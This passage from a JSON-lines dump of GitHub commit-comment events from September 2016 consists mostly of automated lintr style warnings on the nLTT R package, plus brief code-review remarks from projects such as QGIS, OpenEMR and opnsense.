^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:44:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L44) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:48:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L48) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:52:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L52) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:59:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L59) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:72:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L72) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:75:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L75) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:79:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L79) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:83:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L83) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:91:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L91) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_calculate_weight.R:2:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tweights <- rep(1, 2);\n^\n```\n[tests/testthat/test_calculate_weight.R:3:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tparticles <- list();\n^\n```\n[tests/testthat/test_calculate_weight.R:4:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:2) {\n^\n```\n[tests/testthat/test_calculate_weight.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tparticles[[i]] <- c(10, 10)\n^~\n```\n[tests/testthat/test_calculate_weight.R:5:17:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​\tweights <- rep(1, 2);\n               ~^\n```\n[tests/testthat/test_calculate_weight.R:6:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[tests/testthat/test_calculate_weight.R:6:19:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​\tparticles <- list();\n                 ~^~~\n```\n[tests/testthat/test_calculate_weight.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tsigma <- 1;\n^\n```\n[tests/testthat/test_calculate_weight.R:7:12:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:2) {\n           ^\n```\n[tests/testthat/test_calculate_weight.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tprior_density_function <- function(x) {\n^\n```\n[tests/testthat/test_calculate_weight.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[1], min=0, max=1000) *\n^~\n```\n[tests/testthat/test_calculate_weight.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n^~\n```\n[tests/testthat/test_calculate_weight.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:11:32:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\tprior_density_function <- function(x) {\n                              ~^~~\n```\n[tests/testthat/test_calculate_weight.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~\n```\n[tests/testthat/test_calculate_weight.R:13:46:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L13) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n                                             ^\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:15:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L16) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:16:61:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:16:90:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L16) *style:* **Commented code should be removed.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                                                         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L17) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:61:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:22:61:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:22:88:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                                                       ^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L23) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:23:61:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n                                                            ^~\n```\n[tests/testthat/test_calculate_weight.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:26:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/tests/testthat/test_calculate_weight.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```"}},"created_at":"2016-09-14T09:16:37Z"}
{"id":"4560778809","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19014998,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-14T09:16:44Z","updated_at":"2016-09-14T09:16:44Z","body":"That was producing tons of warnings here. They could be sorted out but I think the later approach should also work, so if you have the chance to test it, that will be much appreciated :)"}},"created_at":"2016-09-14T09:16:44Z"}
{"id":"4560780328","type":"CommitCommentEvent","actor":{"login":"roukaour"},"repo":{"name":"roukaour/pokecrystal"},"payload":{"comment":{"id":19015001,"position":null,"line":null,"path":null,"commit_id":"01fc75e4bd3ece37c3e335a8e696255e3b5d1090","created_at":"2016-09-14T09:17:05Z","updated_at":"2016-09-14T09:17:05Z","body":"That's certainly possible. But the inconsistency bothers me, and is the encounter function really important? There's no more Shuckle to be a Rock Smash–only Pokémon, and there are no random fossils available like in HG/SS. Thoughts?"}},"created_at":"2016-09-14T09:17:05Z"}
{"id":"4560780600","type":"CommitCommentEvent","actor":{"login":"Gaserd"},"repo":{"name":"andywer/postcss-debug"},"payload":{"comment":{"id":19015003,"position":null,"line":null,"path":null,"commit_id":"3aa66d1c82737ef9016329c9e187645e0c2a4166","created_at":"2016-09-14T09:17:09Z","updated_at":"2016-09-14T09:17:09Z","body":"nice ! "}},"created_at":"2016-09-14T09:17:09Z"}
{"id":"4560781299","type":"CommitCommentEvent","actor":{"login":"shaikmutherpasha"},"repo":{"name":"shaikmutherpasha/js"},"payload":{"comment":{"id":19015004,"position":null,"line":null,"path":null,"commit_id":"58f9f5ab5f5ec967da8f8988640a170cf72a0faf","created_at":"2016-09-14T09:17:18Z","updated_at":"2016-09-14T09:17:18Z","body":"added business.css"}},"created_at":"2016-09-14T09:17:18Z"}
{"id":"4560784507","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19015006,"position":41,"line":41,"path":"src/sbin/opnsense-auth","commit_id":"b90babbfd2425e201c372f631c47019572d0f4ac","created_at":"2016-09-14T09:17:59Z","updated_at":"2016-09-14T09:17:59Z","body":"Is this a standard way of doing PAM parameters? Typically \"\\0\" would be used for string safety in C, but if the password is any byte sequence including all unreadable characters this doesn't work without encoding. The trim() is potentially fatal, too."}},"created_at":"2016-09-14T09:17:59Z"}
{"id":"4560785516","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19015008,"position":109,"line":109,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-14T09:18:12Z","updated_at":"2016-09-14T09:18:12Z","body":"to clarify, you won't need $sqlconf.\r\n(for example, the sqlStatement call below means your database connection is already set up and working by OpenEMR via the globals.php include)"}},"created_at":"2016-09-14T09:18:12Z"}
{"id":"4560786791","type":"CommitCommentEvent","actor":{"login":"thienphu0405"},"repo":{"name":"EnviroDIY/Arduino-SDI-12"},"payload":{"comment":{"id":19015011,"position":57,"line":55,"path":"examples/c_check_all_addresses/c_check_all_addresses.ino","commit_id":"58b1c211acd936ed0ab993bff005c08106ba2429","created_at":"2016-09-14T09:18:26Z","updated_at":"2016-09-14T09:18:26Z","body":"vbm,./"}},"created_at":"2016-09-14T09:18:26Z"}
{"id":"4560787674","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19015014,"position":187,"line":187,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-14T09:18:37Z","updated_at":"2016-09-14T09:18:37Z","body":"sounds good"}},"created_at":"2016-09-14T09:18:37Z"}
{"id":"4560789253","type":"CommitCommentEvent","actor":{"login":"adamniedzielski"},"repo":{"name":"jackkinsella/confessions"},"payload":{"comment":{"id":19015019,"position":168,"line":168,"path":"app/views/books/marketing_for_programmers.html.erb","commit_id":"a11d81d8106b57f680a79fe4858dd9118b54e16d","created_at":"2016-09-14T09:18:56Z","updated_at":"2016-09-14T09:18:56Z","body":"We should probably bundle these images with the application code, instead of relying on them being available at these URLs.."}},"created_at":"2016-09-14T09:18:56Z"}
{"id":"4560789628","type":"CommitCommentEvent","actor":{"login":"martinwiboe"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19015021,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T09:19:01Z","updated_at":"2016-09-14T09:19:01Z","body":"@grendello thanks for your reply :) So you assume that the caller gives a complete url without any escaping? How does that work for url parameters with ampersands? Like http://example.com/?param1=test&hello&param2=test\r\n\r\nThe example above is impossible to parse correctly (the first ampersand should be encoded, the latter not). I think the caller will need to escape the url parameters correctly and your class should do no encoding. But also, not use Uri.ToString() as that will undo escaping by the caller."}},"created_at":"2016-09-14T09:19:01Z"}
{"id":"4560790380","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"fedora-python/portingguide"},"payload":{"comment":{"id":19015028,"position":null,"line":null,"path":null,"commit_id":"a6b2f70191174c97387801a95b2a633fdc89f60b","created_at":"2016-09-14T09:19:12Z","updated_at":"2016-09-14T09:19:12Z","body":"Looks good to me, thank you"}},"created_at":"2016-09-14T09:19:12Z"}
{"id":"4560793253","type":"CommitCommentEvent","actor":{"login":"shaikmutherpasha"},"repo":{"name":"shaikmutherpasha/js"},"payload":{"comment":{"id":19015033,"position":18,"line":18,"path":"business.html","commit_id":"58f9f5ab5f5ec967da8f8988640a170cf72a0faf","created_at":"2016-09-14T09:19:45Z","updated_at":"2016-09-14T09:19:45Z","body":"removed"}},"created_at":"2016-09-14T09:19:45Z"}
{"id":"4560794747","type":"CommitCommentEvent","actor":{"login":"gaofeng0902"},"repo":{"name":"gaofeng0902/ideal-disco"},"payload":{"comment":{"id":19015035,"position":null,"line":null,"path":null,"commit_id":"56229787d57e35931995b151cb8b5138a22d18fd","created_at":"2016-09-14T09:20:05Z","updated_at":"2016-09-14T09:20:05Z","body":"hello ,the first comment!please help me!"}},"created_at":"2016-09-14T09:20:05Z"}
{"id":"4560795420","type":"CommitCommentEvent","actor":{"login":"chrjohn"},"repo":{"name":"quickfix-j/quickfixj"},"payload":{"comment":{"id":19015036,"position":null,"line":null,"path":null,"commit_id":"2c4ad734c214050cdc653897d5276e993746f226","created_at":"2016-09-14T09:20:14Z","updated_at":"2016-09-14T09:20:14Z","body":"There is none. ;)\r\nAre you interested in a specific issue resolution or is this just a general question?"}},"created_at":"2016-09-14T09:20:14Z"}
{"id":"4560797114","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19015040,"position":246,"line":246,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-14T09:20:34Z","updated_at":"2016-09-14T09:20:34Z","body":"Sounds good. Will watch this issue develop as the code matures."}},"created_at":"2016-09-14T09:20:34Z"}
{"id":"4560798628","type":"CommitCommentEvent","actor":{"login":"schwabe"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":19015042,"position":6,"line":9,"path":"tools/commit-tests.sh","commit_id":"ba29af2c0e3e44dfd844b8406f007ac6d150f77b","created_at":"2016-09-14T09:20:53Z","updated_at":"2016-09-14T09:20:53Z","body":"I think you have now -j two times. "}},"created_at":"2016-09-14T09:20:53Z"}
{"id":"4560799248","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"jlandwehr-avarteq/ruby_introduction_course"},"payload":{"comment":{"id":19015044,"position":7,"line":7,"path":"blog/app/views/articles/show.html.erb","commit_id":"a9bf7605d3c430989a9004e21d1c8d29c4565897","created_at":"2016-09-14T09:21:01Z","updated_at":"2016-09-14T09:21:01Z","body":"is `text` a text format?\r\n\r\nThen you should maybe use a `simple_format`?\r\n"}},"created_at":"2016-09-14T09:21:01Z"}
{"id":"4560800121","type":"CommitCommentEvent","actor":{"login":"pasqLisena"},"repo":{"name":"DOREMUS-ANR/doremus-ontology"},"payload":{"comment":{"id":19015045,"position":null,"line":null,"path":null,"commit_id":"dd62889d3627e4e693a2cf176b1f2dcc6f58bdf8","created_at":"2016-09-14T09:21:14Z","updated_at":"2016-09-14T09:21:14Z","body":"this fix #10 "}},"created_at":"2016-09-14T09:21:14Z"}
{"id":"4560801646","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19015049,"position":null,"line":null,"path":null,"commit_id":"15538ccc313ab3af967838fac7e5ff1ac2f5987a","created_at":"2016-09-14T09:21:31Z","updated_at":"2016-09-14T09:21:31Z","body":"[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:38:47:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_average_nltt.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny2), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:86:47:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_average_nltt.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny2), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:96:29:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_average_nltt.R#L96) *style:* **Trailing whitespace is superfluous.**\n```r\n​  c(phylogeny1, phylogeny2), \n                            ^\n```\n[inst/doc/vignette_get_average_nltt.R:100:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_average_nltt.R#L100) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:146:54:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_nltt_values.R#L146) *style:* **Trailing whitespace is 